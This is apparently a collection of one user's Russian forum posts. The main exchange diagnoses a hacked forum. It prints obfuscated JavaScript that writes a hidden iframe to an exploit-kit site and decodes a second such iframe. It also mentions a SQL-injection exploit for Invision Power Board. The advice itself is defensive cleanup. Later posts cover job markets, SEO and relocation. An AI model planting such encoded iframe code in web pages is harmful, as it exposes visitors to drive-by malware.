Сплоит на сколько помню, юзает SQL injection и вытягивает из БД хеш юзера который указывается при запуске сплоита, по этому вам как администратору рекомендую поставить себе пароль состоящий из букв разного регистра, цифр, символов и длиной больше 10. Это хотябы затруднит брут хеша полученного с помощью сплоита!
И уберите ссылку из первого поста, пока школохекеры не налетели :)
Не посмотрел, что за форум :) Потом пост отредактировал.
Под Invision Power Board v1.3 Final давно уже сплоит есть с которым каждый школьник сможет разобраться :)
Я бы обновился)
<script language='javascript'>document.write(unescape('%3C%69%66%72%61%6D%65%0A%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%75%74%6F%64%69%76%61%2E%72%75%2F%31%2E%68%74%6D%6C%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%6E%61%6D%65%3D%22%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%69%64%3D%22%31%22%20%2F%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
создаём html документ, пишем в нём:
<script>alert(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%62%6F%72%64%65%72%3D%30%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%63%61%6E%65%64%2E%69%6E%66%6F%2F%74%64%73%2F%69%6E%2E%63%67%69%3F%32%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
Открываем этот документ в браузере и получаем алерт с текстом:
Как и думал, зашифрованный iframe на связку сплоитов.
Проверьте код движка или шаблона вашего форума и удалите этот JS. Смените пароли на хостинге, фтп и т.д. и попробуйте поискать шелл у себя на сервере :) Ну и подумайте как вас могли взломать, то ли это где то уязвимость в форуме или сторонних движках установленных на вашем сервере, то ли был задействован реверс ip, ну и как вариант получили ваши пароли.
Удачи!
Мда, в лаборатории касперского по ходу совсем идиоты сидят..
Киньте в личку пожалуйста весь JS, попробую декодировать и посмотреть, что там.
Но больше чем уверен, что там фрейм на станицу со связкой :)
UPD: Хотя не надо, хоть чуть-чуть погуглите, этот код уже ни раз в инете обсуждался ;)
Не так давно смотрел статистику востребованности ЯП на рынке труда в различных регионах. Почти везде Си на первом месте. На втором если не ошибаюсь, JAVA..
На сёрче уже стало традицией неадекватно реагировать на подобного рода предложения :( имхо..
Вы тоже подумайте логически.. Дело не в деньгах)
Те кто зарабатывают такие суммы на сапе, вряд ли смогут найти время на обучение 😎
ИМХО если человек умеет зарабатывать, он будет делать именно это, а не обучать людей :)
Если приобретать ваши уроки по впихиванию дора в индекс Апорта за 400$, то эта тема в подарок? :D
Думал тема будет про газ в Белоруссии :D
По сабжу: Хорошо там где нас нет! Переезд в другой город, не говоря уже о другой стране, довольно тяжёлый шаг и если на него решаться, то уж явно лучше в Европу :)
